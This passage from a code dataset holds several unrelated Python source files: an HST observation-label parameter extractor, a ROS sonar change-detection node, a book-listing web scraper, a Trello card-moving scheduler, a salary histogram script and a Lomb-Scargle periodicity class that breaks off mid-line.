str(lookup[\"PLATESC\"])\n except KeyError:\n pass\n # Works for any instrument tabulated in the PLATE_SCALEs dictionary above\n instrument = get_instrument_id(data_lookups, shm_lookup)\n detectors = get_detector_ids(data_lookups, shm_lookup)\n scale = SCALE_MAX = 1.0e99\n for detector in detectors:\n key = (instrument, detector)\n if key in PLATE_SCALES:\n scale = min(scale, PLATE_SCALES[key])\n if scale < SCALE_MAX:\n scale *= int(get_binning_mode(data_lookups, shm_lookup))\n formatted = \"%.4f\" % scale # up to 4 decimal places\n return formatted.rstrip(\"0\") # don't include trailing zeros\n return \"0.0\"\n\n\n##############################\n# get_spectral_resolution\n##############################\ndef get_spectral_resolution(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n # Works for STIS\n try:\n return \"%.4f\" % (float(lookup[\"SPECRES\"]) * 1.0e-4)\n except KeyError:\n return \"0.\"\n\n\n##############################\n# get_start_stop_date_time\n##############################\ndef get_start_stop_date_times(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> Tuple[str, str]:\n \"\"\"\n Return text for the ```` and ```` XML\n elements.\n \"\"\"\n\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n\n # HST documents indicate that times are only accurate to a second or so.\n # This is consistent with the fact that start times indicated by DATE-OBS\n # and TIME-OBS often disagree with the times as indicated by EXPSTART at the\n # level of a second or so. For any individual time, this is fine, but we\n # want to be sure that the difference between the start and stop times is\n # compatible with the exposure time, whenever appropriate.\n #\n # I say \"whenever appropriate\" because there are times when multiple images\n # have been drizzled or otherwise merged. In this case, the start and stop\n # times refer to the first and last of the set of images, respectively, and\n # their difference can be much greater than the exposure time.\n #\n # It takes some careful handling to get the behavior we want.\n\n # Figure out what's available in the header\n try:\n date_obs = lookup[\"DATE-OBS\"]\n except KeyError:\n date_obs = None\n\n try:\n time_obs = lookup[\"TIME-OBS\"]\n except KeyError:\n time_obs = None\n\n exptime = float(lookup[\"EXPTIME\"])\n\n try: # either EXPSTART or TEXPSTART should be available\n expstart = float(lookup[\"EXPSTART\"])\n except KeyError:\n expstart = float(lookup[\"TEXPSTART\"])\n\n try: # either EXPEND or TEXPEND should be available\n expend = float(lookup[\"EXPEND\"])\n except KeyError:\n expend = float(lookup[\"TEXPEND\"])\n\n # Decide which delta-time to use\n # Our start and stop times are only ever good to the nearest second, but we\n # want to ensure that the difference looks right. For this purpose,\n # non-integral exposure times should be rounded up to the next integer.\n delta_from_mjd = (expend - expstart) * 86400.0\n if delta_from_mjd > exptime + 2.0: # if the delta is too large, we know\n # multiple images were combined\n delta = delta_from_mjd\n else:\n delta = -(-exptime // 1.0) # rounded up to nearest int\n\n # Fill in the start time; update the expstart in MJD units if necessary.\n # If DATE-OBS and TIME-OBS values are provided, we use this as the start\n # time because it is the value our users would expect. 
There exist cases\n # when these values are not provided, and in that case we use EXPSTART,\n # converted from MJD. Note that these MJD values are in UTC, not TAI. In\n # other words, we need to ignore leapseconds in these time conversions.\n if date_obs and time_obs:\n start_time = date_obs + \"T\" + time_obs + \"Z\"\n day = julian.day_from_iso(date_obs)\n sec = julian.sec_from_iso(time_obs)\n expstart = julian.mjd_from_day_sec(day, sec)\n else:\n (day, sec) = julian.day_sec_from_mjd(expstart)\n start_time = julian.ymdhms_format_from_day_sec(day, sec, suffix=\"Z\")\n\n # Fill in the stop time. We ensure that this differs from the start time by\n # the expected amount.\n expend = expstart + delta / 86400.0\n (day, sec) = julian.day_sec_from_mjd(expend)\n stop_time = julian.ymdhms_format_from_day_sec(day, sec, suffix=\"Z\")\n\n return (start_time, stop_time)\n\n\n##############################\n# get_subarray_flag\n##############################\ndef get_subarray_flag(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ``<subarray_flag>`` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n value: str = lookup[\"SUBARRAY\"]\n if value == \"1\" or value.startswith(\"T\"):\n return \"true\"\n elif value == \"0\" or value.startswith(\"F\"):\n return \"false\"\n raise ValueError(\n \"unrecognized SUBARRAY value (%s) in %s\" % (value, fname(lookup))\n )\n except KeyError:\n return \"false\"\n\n\n##############################\n# get_targeted_detector_ids\n##############################\ndef get_targeted_detector_ids(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> List[str]:\n \"\"\"\n Return a list of one or more text values for the\n ``<targeted_detector_id>`` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n aperture = get_aperture_name(data_lookups, shm_lookup)\n if instrument == \"WFPC2\":\n if aperture in (\"WFALL\", \"WFALL-FIX\"):\n return [\"PC1\", \"WF2\", \"WF3\", \"WF4\"]\n if aperture in (\"PC1\", \"PC1-FIX\", \"POLQP15P\", \"FQCH4P15\"):\n return [\"PC1\"]\n if aperture in (\n \"WF2\",\n \"WF2-FIX\",\n \"FQUVN33\",\n \"POLQN33\",\n \"POLQN18\",\n \"POLQP15W\",\n \"FQCH4NW2\",\n ):\n return [\"WF2\"]\n if aperture == \"FQCH4N33\":\n return [\"WF2\", \"WF3\"]\n if aperture in (\"WF3\", \"WF3-FIX\", \"FQCH4NW3\", \"F160BN15\"):\n return [\"WF3\"]\n if aperture in (\"WF4\", \"WF4-FIX\", \"FQCH4NW4\", \"FQCH4W4\"):\n return [\"WF4\"]\n if aperture == \"FQCH4N1\":\n return [\"PC1\", \"WF3\"]\n if aperture == \"FQCH4N15\":\n return [\"PC1\"]\n if aperture == \"FQCH4W3\":\n return [\"WF3\"]\n raise ValueError(\n \"unrecognized WFPC2 aperture (%s) for %s [%s]\"\n % (aperture, fname(lookup), lookup),\n )\n channel = get_channel_id(data_lookups, shm_lookup)\n if instrument == \"ACS\" and channel == \"WFC\":\n if aperture.startswith(\"WFC1\"):\n return [\"WFC1\"]\n if aperture.startswith(\"WFC2\"):\n return [\"WFC2\"]\n return [\"WFC1\", \"WFC2\"]\n if instrument == \"WFC3\" and channel == \"UVIS\":\n if aperture.startswith(\"UVIS1\"):\n return [\"UVIS1\"]\n if aperture.startswith(\"UVIS2\"):\n return [\"UVIS2\"]\n if aperture.startswith(\"UVIS-QUAD\"):\n filter = lookup[\"FILTER\"].strip()\n if filter in (\n \"FQ378N\",\n \"FQ387N\",\n \"FQ437N\",\n \"FQ492N\",\n \"FQ508N\",\n \"FQ619N\",\n \"FQ674N\",\n \"FQ750N\",\n \"FQ889N\",\n \"FQ937N\",\n ):\n return [\"UVIS1\"]\n if filter in (\n \"FQ232N\",\n \"FQ243N\",\n \"FQ422M\",\n \"FQ436N\",\n 
\"FQ575N\",\n \"FQ634N\",\n \"FQ672N\",\n \"FQ727N\",\n \"FQ906N\",\n \"FQ924N\",\n ):\n return [\"UVIS2\"]\n raise ValueError(\n \"unrecognized quad aperture/filter (%s/%s) in %s\"\n % (aperture, filter, fname(lookup))\n )\n return [\"UVIS1\", \"UVIS2\"]\n if instrument == \"WF/PC\":\n # I cannot find documentation for the apertures for WF/PC so this is\n # just an educated guess\n if aperture not in (\"ALL\", \"W1\", \"W2\", \"W3\", \"W4\", \"P5\", \"P6\", \"P7\", \"P8\"):\n raise ValueError(\n \"unknown WF/PC aperture (%s) in %s\" % (aperture, fname(lookup))\n )\n if aperture == \"ALL\":\n return get_detector_ids(data_lookups, shm_lookup) # all detectors\n elif aperture.startswith(\"W\"):\n return [aperture[0] + \"F\" + aperture[1]] # WFn\n else:\n return [aperture[0] + \"C\" + aperture[1]] # PCn\n return get_detector_ids(data_lookups, shm_lookup)\n\n\n############################################################\n\n\ndef _make_fragment(\n param_name: str, param_values: List[str], node_builder: NodeBuilderTemplate\n) -> FragBuilder:\n return combine_nodes_into_fragment(\n [node_builder({param_name: value}) for value in param_values]\n )\n\n\ndef _get_detector_ids_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"detector_id\", get_detector_ids(data_lookup, shm_lookup), detector_id\n )\n\n\ndef _get_moving_target_descriptions_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"moving_target_description\",\n get_moving_target_descriptions(data_lookup, shm_lookup),\n moving_target_description,\n )\n\n\ndef _get_moving_target_keywords_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"moving_target_keyword\",\n get_moving_target_keywords(data_lookup, shm_lookup),\n moving_target_keyword,\n )\n\n\ndef _get_targeted_detector_ids_fragment(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> FragBuilder:\n return _make_fragment(\n \"targeted_detector_id\",\n get_targeted_detector_ids(data_lookup, shm_lookup),\n targeted_detector_id,\n )\n\n\n############################################################\n\n\ndef _get_program_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"mast_observation_id\": get_mast_observation_id(data_lookup, shm_lookup),\n \"hst_proposal_id\": get_hst_proposal_id(data_lookup, shm_lookup),\n \"hst_pi_name\": get_hst_pi_name(data_lookup, shm_lookup),\n }\n\n\ndef _get_instrument_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"instrument_id\": get_instrument_id(data_lookup, shm_lookup),\n \"channel_id\": get_channel_id(data_lookup, shm_lookup),\n \"detector_ids\": _get_detector_ids_fragment(data_lookup, shm_lookup), # FRAGMENT\n \"observation_type\": get_observation_type(data_lookup, shm_lookup),\n }\n\n\ndef _get_pointing_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"hst_target_name\": get_hst_target_name(data_lookup, shm_lookup),\n \"moving_target_flag\": get_moving_target_flag(data_lookup, shm_lookup),\n \"moving_target_keywords\": _get_moving_target_keywords_fragment(\n data_lookup, shm_lookup\n ), # FRAGMENT\n \"moving_target_descriptions\": _get_moving_target_descriptions_fragment(\n data_lookup, shm_lookup\n ), # FRAGMENT\n \"aperture_name\": get_aperture_name(data_lookup, shm_lookup),\n \"proposed_aperture_name\": get_proposed_aperture_name(data_lookup, 
shm_lookup),\n \"targeted_detector_ids\": _get_targeted_detector_ids_fragment(\n data_lookup, shm_lookup\n ), # FRAGMENT\n }\n\n\ndef _get_tracking_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"fine_guidance_sensor_lock_type\": get_fine_guidance_sensor_lock_type(\n data_lookup, shm_lookup\n ),\n \"gyroscope_mode\": get_gyroscope_mode(data_lookup, shm_lookup),\n }\n\n\ndef _get_exposure_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"exposure_duration\": get_exposure_duration(data_lookup, shm_lookup),\n \"exposure_type\": get_exposure_type(data_lookup, shm_lookup),\n }\n\n\ndef _get_wavelength_filter_grating_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"filter_name\": get_filter_name(data_lookup, shm_lookup),\n \"center_filter_wavelength\": get_center_filter_wavelength(\n data_lookup, shm_lookup\n ),\n \"bandwidth\": get_bandwidth(data_lookup, shm_lookup),\n \"spectral_resolution\": get_spectral_resolution(data_lookup, shm_lookup),\n }\n\n\ndef _get_operational_parameters(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n return {\n \"instrument_mode_id\": get_instrument_mode_id(data_lookup, shm_lookup),\n \"gain_setting\": get_gain_setting(data_lookup, shm_lookup),\n \"coronagraph_flag\": get_coronagraph_flag(data_lookup, shm_lookup),\n \"cosmic_ray_split_count\": get_cosmic_ray_split_count(data_lookup, shm_lookup),\n \"repeat_exposure_count\": get_repeat_exposure_count(data_lookup, shm_lookup),\n \"subarray_flag\": get_subarray_flag(data_lookup, shm_lookup),\n \"binning_mode\": get_binning_mode(data_lookup, shm_lookup),\n \"plate_scale\": get_plate_scale(data_lookup, shm_lookup),\n }\n\n\ndef get_hst_parameters_dict(\n data_lookup: List[Lookup], shm_lookup: Lookup\n) -> Dict[Any, Any]:\n sub_dicts: List[Dict[Any, Any]] = [\n _get_program_parameters(data_lookup, shm_lookup),\n _get_instrument_parameters(data_lookup, shm_lookup),\n _get_pointing_parameters(data_lookup, shm_lookup),\n _get_tracking_parameters(data_lookup, shm_lookup),\n _get_exposure_parameters(data_lookup, shm_lookup),\n _get_wavelength_filter_grating_parameters(data_lookup, shm_lookup),\n _get_operational_parameters(data_lookup, shm_lookup),\n ]\n return {key: val for d in sub_dicts for key, val in d.items()}\n\n\n############################################################\ndef get_hst_parameters(data_lookup: List[Lookup], shm_lookup: Lookup) -> NodeBuilder:\n d: Dict[Any, Any] = get_hst_parameters_dict(data_lookup, shm_lookup)\n return hst_parameters(\n {\n \"program_parameters\": program_parameters(d),\n \"instrument_parameters\": instrument_parameters(d),\n \"pointing_parameters\": pointing_parameters(d),\n \"tracking_parameters\": tracking_parameters(d),\n \"exposure_parameters\": exposure_parameters(d),\n \"wavelength_filter_grating_parameters\": wavelength_filter_grating_parameters(\n d\n ),\n \"operational_parameters\": operational_parameters(d),\n }\n )\n","sub_path":"pdart/labels/hst_parameters.py","file_name":"hst_parameters.py","file_ext":"py","file_size_in_byte":37637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"597470252","text":"#!/usr/bin/env python\n\nimport rospy\n\nimport cv2\nimport scipy.misc\nfrom PIL import Image\n\nimport numpy as np\nimport scipy.interpolate\nimport math\nimport matplotlib.pyplot as plt\n\nimport tf\nimport tf2_ros\nfrom tf.transformations import 
rotation_matrix, rotation_from_matrix, translation_matrix, translation_from_matrix, quaternion_matrix, quaternion_from_matrix\n\nfrom sensor_msgs.msg import PointCloud2\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Transform, PoseWithCovarianceStamped\nimport sensor_msgs.point_cloud2 as pc2\n\nimport message_filters\n\nclass ChangeDetector(object):\n\n def __init__(self):\n\n map_frame = rospy.get_param('~map_frame', 'map') # map frame_id\n odom_frame = rospy.get_param('~odom_frame', 'odom')\n meas_model_as = rospy.get_param('~mbes_as', '/mbes_sim_server') # map frame_id\n auv_odom_top = rospy.get_param(\"~odometry_topic\", '/odom')\n auv_mbes_top = rospy.get_param(\"~mbes_pings_topic\", '/mbes')\n auv_exp_mbes_top = rospy.get_param(\"~expected_mbes_topic\", '/expected_mbes')\n pf_pose_top = rospy.get_param(\"~average_pose_topic\", '/avg_pose')\n\n self.auv_mbes = message_filters.Subscriber(auv_mbes_top, PointCloud2)\n self.exp_mbes = message_filters.Subscriber(auv_exp_mbes_top, PointCloud2)\n self.auv_pose = message_filters.Subscriber(auv_odom_top, Odometry)\n # self.pf_pose = message_filters.Subscriber(pf_pose_top, PoseWithCovarianceStamped)\n self.ts = message_filters.ApproximateTimeSynchronizer([self.auv_mbes, self.exp_mbes,\n self.auv_pose],\n 10, slop=10.0,\n allow_headerless=False)\n\n # Initialize tf listener\n tfBuffer = tf2_ros.Buffer()\n tf2_ros.TransformListener(tfBuffer)\n try:\n rospy.loginfo(\"Waiting for transforms\")\n mbes_tf = tfBuffer.lookup_transform('hugin/base_link', 'hugin/mbes_link',\n rospy.Time(0), rospy.Duration(20.))\n self.base2mbes_mat = self.matrix_from_tf(mbes_tf)\n\n m2o_tf = tfBuffer.lookup_transform(map_frame, odom_frame,\n rospy.Time(0), rospy.Duration(20.))\n self.m2o_mat = self.matrix_from_tf(m2o_tf)\n\n rospy.loginfo(\"Transforms locked - Car detector node\")\n except:\n rospy.loginfo(\"ERROR: Could not lookup transform from base_link to mbes_link\")\n\n\n # Register cb after tf is locked\n self.ts.registerCallback(self.pingCB)\n\n plt.ion()\n plt.show()\n self.scale = 1\n self.max_height = 100 # TODO: this should equal the n beams in ping\n self.new_msg = False\n first_msg = True\n self.waterfall =[]\n\n while not rospy.is_shutdown():\n if self.new_msg:\n # Blob detection to find the car on waterfall image\n #Visualize\n if len(self.waterfall)==self.max_height:\n waterfall_detect = self.car_detection(np.array(self.waterfall), self.scale)\n plt.imshow(np.array(waterfall_detect), norm=plt.Normalize(0., 60.),\n cmap='gray', aspect='equal')\n else:\n plt.imshow(np.array(self.waterfall), norm=plt.Normalize(0., 60.),\n cmap='gray', aspect='equal')\n if first_msg:\n first_msg = False\n plt.colorbar()\n plt.title(\"Bathymetry difference (m)\")\n\n plt.pause(0.01)\n\n self.new_msg = False\n\n # rospy.spin()\n\n def car_detection(self, img_array, scale):\n # Turn numpy array into cv2 image (and make bigger)\n img_array = np.float32(img_array)\n f = scipy.interpolate.RectBivariateSpline(np.linspace(0 ,1, np.size(img_array, 0)), np.linspace(0, 1, np.size(img_array, 1)), img_array)\n img_array = f(np.linspace(0, 1, scale*np.size(img_array, 0)), np.linspace(0, 1, scale*np.size(img_array, 1)))\n gray_img = cv2.normalize(src=img_array, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n\n # Setup SimpleBlobDetector parameters.\n params = cv2.SimpleBlobDetector_Params()\n\n params.minThreshold = 100;\n params.maxThreshold = 5000;\n\n params.filterByArea = True\n params.minArea = 200\n\n params.filterByCircularity = 
False\n params.minCircularity = 0.785\n\n params.filterByConvexity = False\n params.minConvexity = 0.87\n detector = cv2.SimpleBlobDetector_create(params)\n\n # Detect blobs.\n keypoints = detector.detect(gray_img)\n im_with_keypoints = cv2.drawKeypoints(gray_img, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n #gray_im_with_keypoints = cv2.cvtColor(im_with_keypoints, cv2.COLOR_BGR2GRAY)\n\n # Turn cv2 image back to numpy array, scale it down, and return\n out_img_array = np.empty((np.size(img_array,0), np.size(img_array,1) ,3), dtype=float)\n for i in range(np.size(im_with_keypoints,2)):\n f = scipy.interpolate.RectBivariateSpline(np.linspace(0 ,255, np.size(im_with_keypoints, 0)),\n np.linspace(0,255, np.size(im_with_keypoints, 1)), im_with_keypoints[:,:,i])\n out_img_array[:,:,i] = f(np.linspace(0, 255, np.size(img_array, 0)), np.linspace(0, 255, np.size(img_array, 1)))\n out_img_array = out_img_array.astype(float)\n return out_img_array\n\n def pcloud2ranges(self, point_cloud, tf_mat):\n angle, direc, point = rotation_from_matrix(tf_mat)\n R = rotation_matrix(angle, direc, point)\n rot_inv = R[np.ix_([0,1,2],[0,1,2])].transpose()\n\n t = translation_from_matrix(tf_mat)\n t_inv = rot_inv.dot(t)\n\n ranges = []\n for p in pc2.read_points(point_cloud, field_names = (\"x\", \"y\", \"z\"), skip_nans=True):\n p_part = rot_inv.dot(p) - t_inv\n ranges.append(np.linalg.norm(p_part))\n\n return np.asarray(ranges)\n\n def ping2ranges(self, point_cloud):\n\n ranges = []\n for p in pc2.read_points(point_cloud, field_names = (\"x\", \"y\", \"z\"), skip_nans=True):\n ranges.append(np.linalg.norm(p))\n\n return np.asarray(ranges)\n\n\n def pingCB(self, auv_ping, exp_ping, auv_pose):\n try:\n particle_tf = Transform()\n particle_tf.translation = auv_pose.pose.pose.position\n particle_tf.rotation = auv_pose.pose.pose.orientation\n tf_mat = self.matrix_from_tf(particle_tf)\n m2auv = np.matmul(self.m2o_mat, np.matmul(tf_mat, self.base2mbes_mat))\n\n auv_ping_ranges = self.ping2ranges(auv_ping)\n exp_ping_ranges = self.pcloud2ranges(exp_ping, m2auv)\n # print \"------\"\n # print auv_ping_ranges\n # print exp_ping_ranges\n\n self.waterfall.append(abs(auv_ping_ranges[:self.max_height] - exp_ping_ranges[:self.max_height]))\n if len(self.waterfall)>self.max_height:\n self.waterfall.pop(0)\n\n self.new_msg = True\n\n except rospy.ROSInternalException:\n pass\n\n def matrix_from_tf(self, transform):\n if transform._type == 'geometry_msgs/TransformStamped':\n transform = transform.transform\n\n trans = (transform.translation.x,\n transform.translation.y,\n transform.translation.z)\n quat_ = (transform.rotation.x,\n transform.rotation.y,\n transform.rotation.z,\n transform.rotation.w)\n\n tmat = translation_matrix(trans)\n qmat = quaternion_matrix(quat_)\n\n return np.dot(tmat, qmat)\n\n\nif __name__ == '__main__':\n\n rospy.init_node('car_detector_node')\n try:\n ChangeDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not launch car detector node')\n pass\n","sub_path":"detection/change_detection/scripts/change_detector.py","file_name":"change_detector.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"521710585","text":"import requests\nfrom lxml import etree\nfrom bs4 import BeautifulSoup\nimport json\n\n\nclass BookSpider(object):\n def __init__(self):\n self.base_url = 'http://www.allitebooks.com/page/{}'\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}\n\n self.data_list = []\n\n # 1. Build the list of all page URLs\n def get_url_list(self):\n url_list = []\n for i in range(1, 10):\n url = self.base_url.format(i)\n\n url_list.append(url)\n\n return url_list\n\n # 2. Send the request\n def send_request(self, url):\n data = requests.get(url, headers=self.headers).content.decode()\n print(url)\n return data\n\n # 3. Parse the data with XPath\n def parse_xpath_data(self, data):\n parse_data = etree.HTML(data)\n\n # 1. Extract all the books\n book_list = parse_data.xpath('//div[@class=\"main-content-inner clearfix\"]/article')\n\n # 2. Extract each book's details\n for book in book_list:\n book_dict = {}\n # 1. Book title\n book_dict['book_name'] = book.xpath('.//h2[@class=\"entry-title\"]//text()')[0]\n\n # 2. Book cover image URL\n book_dict['book_img_url'] = book.xpath('div[@class=\"entry-thumbnail hover-thumb\"]/a/img/@src')[0]\n\n # 3. Book author\n book_dict['book_author'] = book.xpath('.//h5[@class=\"entry-author\"]//text()')[0]\n\n # 4. Book summary\n book_dict['book_info'] = book.xpath('.//div[@class=\"entry-summary\"]/p/text()')[0]\n\n self.data_list.append(book_dict)\n\n def parse_bs4_data(self, data):\n\n bs4_data = BeautifulSoup(data, 'lxml')\n # 1. Select all the books\n book_list = bs4_data.select('article')\n\n\n\n # 2. Extract each book's details\n for book in book_list:\n book_dict = {}\n # 1. Book title\n book_dict['book_name'] = book.select_one('.entry-title').get_text()\n\n # # 2. Book cover image URL\n book_dict['book_img_url'] = book.select_one('.attachment-post-thumbnail').get('src')\n\n # # 3. Book author\n book_dict['book_author'] = book.select_one('.entry-author').get_text()[3:]\n #\n # # 4. Book summary\n book_dict['book_info'] = book.select_one('.entry-summary p').get_text()\n print(book_dict)\n self.data_list.append(book_dict)\n\n # 4. Save the data\n def save_data(self):\n json.dump(self.data_list, open(\"04book.json\", 'w'))\n\n # Orchestrate the whole run\n def start(self):\n\n url_list = self.get_url_list()\n\n # Loop over the URLs and send requests\n for url in url_list:\n data = self.send_request(url)\n # self.parse_xpath_data(data)\n self.parse_bs4_data(data)\n\n self.save_data()\n\n\nBookSpider().start()\n","sub_path":".NetServiceConfiguration/帮助文档/python/案列/04-book.py","file_name":"04-book.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419278057","text":"import schedule\nimport time\nfrom datetime import datetime, timedelta\nfrom threading import Thread\nfrom services.trello_api_utils import TrelloApiUtils\n\n\n# This class is responsible for transferring cards between lists. 
\n# For example, every day at 00:00 AM move all cards from 'Daily Plan'\n# column to 'Weekly Plan' and the same for 'Weekly' to 'Monthly'\nclass TrelloDashboardCollectorScheduler(Thread):\n \n\n def __init__(self, trello_api_utils):\n Thread.__init__(self)\n self.trello_api_utils = trello_api_utils\n schedule.every().day.at('00:00').do(self.moveTickets)\n # move all tickets with assigned dates into corresponding columns \n schedule.every().day.at(\"00:10\").do(self.trello_api_utils.transfer_tickets_to_corresponding_columns_by_its_due_dates)\n schedule.every().day.at(\"12:00\").do(self.trello_api_utils.transfer_tickets_to_corresponding_columns_by_its_due_dates)\n\n def moveTickets(self):\n # move all cards from 'Daily Plan' list into 'Weekly Plan'\n self.trello_api_utils.transfer_all_cards_from_daily_to_weekly_column()\n\n current_day_and_month = \"{day}.{month}\".format(day = datetime.now().day, month = f\"{datetime.now():%m}\")\n # update title for daily column\n self.trello_api_utils.update_daily_column_date(current_day_and_month)\n\n weekly_column_date_deadline = self.trello_api_utils.get_weekly_column_end_date()\n if weekly_column_date_deadline == current_day_and_month: \n # move all cards from 'Weekly Plan' list into 'Monthly Plan'\n self.trello_api_utils.transfer_all_cards_from_weekly_to_monthly_column()\n \n # update title for weekly column\n new_weekly_column_start_date = \"{startDay}.{startMonth}\".format(\n startDay = datetime.now().day, \n startMonth = f\"{datetime.now():%m}\"\n )\n new_weekly_column_end_date = \"{endDay}.{endMonth}\".format(\n endDay = (datetime.now() + timedelta(days = 7)).day, \n endMonth = f\"{(datetime.now() + timedelta(days = 7)):%m}\"\n )\n self.trello_api_utils.update_weekly_column_dates(new_weekly_column_start_date, new_weekly_column_end_date)\n\n # update title of monthly column\n self.trello_api_utils.update_monthly_column_date(\"{newDate}\".format(newDate = f\"{datetime.now():%m.%y}\"))\n else:\n print(\"[INFO] Today isn't the end of the week\")\n\n def run(self):\n while True:\n schedule.run_pending()\n time.sleep(1)","sub_path":"trello_bot/scheduler_trello_dashboard_collector.py","file_name":"scheduler_trello_dashboard_collector.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419278057","text":"import csv\nimport matplotlib.pyplot as plt\nimport re\n\n\ndef read_csv_column(path, column):\n with open(path, 'r', encoding='utf-8', newline='') as f:\n reader = csv.reader(f)\n return [row[column] for row in reader]\n\n\nsal = read_csv_column('F:\\python代码\\python3.csv', 2)\nsalaries = []\na = []\nfor i in range(len(sal)):\n if not sal[i] == '面议xa0':\n salaries.append(sal[i])\nfor i in range(len(salaries)):\n complete = re.match('\\d{4,5}', salaries[i])\n a.append(int(complete.group()))\n\nplt.hist(a,bins=50)\nplt.show()\n","sub_path":"智联招聘2.py","file_name":"智联招聘2.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"227878021","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 5 12:56:37 2020\n\n@author: jimmy\n\"\"\"\n# Import relevant modules/packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.timeseries import LombScargle\nfrom ReadFile import Read\n\nclass Periodicity:\n \n def __init__(self,filename,objectname,colNames,numPoints=None,contiguous='True',period=None):\n # Inputs:\n # filename: file 
path or file name (if file in same folder as notebook)\n # objectname: name of object you're plotting curve of\n # numPoints: number of data points you want to use from the file\n # period: period of plot feature (only used if xaxis='Phase' to fold the data)\n self.file = filename\n self.object = objectname\n self.numPoints = numPoints\n self.period = period\n \n # Extract time, flux, and error data from text file\n self.times,self.fluxes,self.errors = Read(self.file,colNames)\n\n # Decide what times array to make\n if self.numPoints == None:\n self.times = [time - self.times[0] for time in self.times]\n else:\n if contiguous == 'True':\n # Select contiguous interval of points\n self.times = [time - self.times[0] for time in self.times[:self.numPoints]]\n self.fluxes = self.fluxes[:self.numPoints]\n self.errors = self.errors[:self.numPoints]\n elif contiguous == 'Bookend':\n # Select sparsed interval of data\n self.times_i = [time - self.times[0] for time in self.times[:self.numPoints]]\n self.times_f = [time - self.times[0] for time in self.times[-self.numPoints:]]\n self.times = self.times_i + self.times_f\n \n # Concatenate first and last n elements of flux list\n self.fluxes_i = self.fluxes[:self.numPoints]\n self.fluxes_f = self.fluxes[-self.numPoints:]\n self.fluxes = [*self.fluxes_i,*self.fluxes_f]\n \n # Concatenate first and last n elements of error list\n self.errors_i = self.errors[:self.numPoints]\n self.errors_f = self.errors[-self.numPoints:]\n self.errors = [*self.errors_i,*self.errors_f]\n elif contiguous == 'Random':\n # Generate random list of indices\n randoms = np.random.randint(0, high=len(self.times), size=numPoints)\n #print(randoms)\n # Select random sparsed interval of data\n self.times = self.times[randoms]\n \n # Concatenate first and last n elements of flux list\n self.fluxes = self.fluxes[randoms]\n \n # Concatenate first and last n elements of error list\n self.errors = self.errors[randoms]\n\n # Function for plotting light curves from text file\n def LightCurve(self,plot=True,xaxis='Time',curve='Flux'):\n # Inputs:\n # plot: boolean to decide whether to plot the data (True) or not (False)\n # xaxis: decide which x parameter to calculate/plot ('Time or Phase')\n # curve: string that indicates y parameter being plotted (used in axis label)\n # Returns:\n # xdata: array with data from x-axis\n # fluxes: array with associated y-axis data\n # errors: measurement errors read from text file\n \n # Define list of data to plot on x-axis (time or phase)\n xdata = []\n \n if plot == True:\n # Initialize axis figure and axis\n fig = plt.figure()\n ax = fig.add_subplot(111)\n \n # Decide what x-axis should be\n if xaxis == 'Time':\n xlabel = 'Time (days)'\n \n # Plot flux vs time\n ax.scatter(self.times,self.fluxes)\n \n xdata = self.times\n \n elif xaxis == 'Phase':\n xlabel = 'Phase'\n \n # Calculate phase from time data\n phases = [(time%self.period)/self.period for time in self.times]\n \n # Make a scatter plot of flux vs. phase\n ax.scatter(phases,self.fluxes,label='Period = {0:.3f} days'.format(self.period))\n \n xdata = phases\n ax.set_ylim(0.999,1.0006)\n ax.set_xlim(0.0,0.2)\n \n # Add plot features\n ax.set_xlabel(xlabel,fontsize=14)\n ax.set_ylabel('{0}'.format(curve),fontsize=14)\n ax.set_title('{0} vs. 
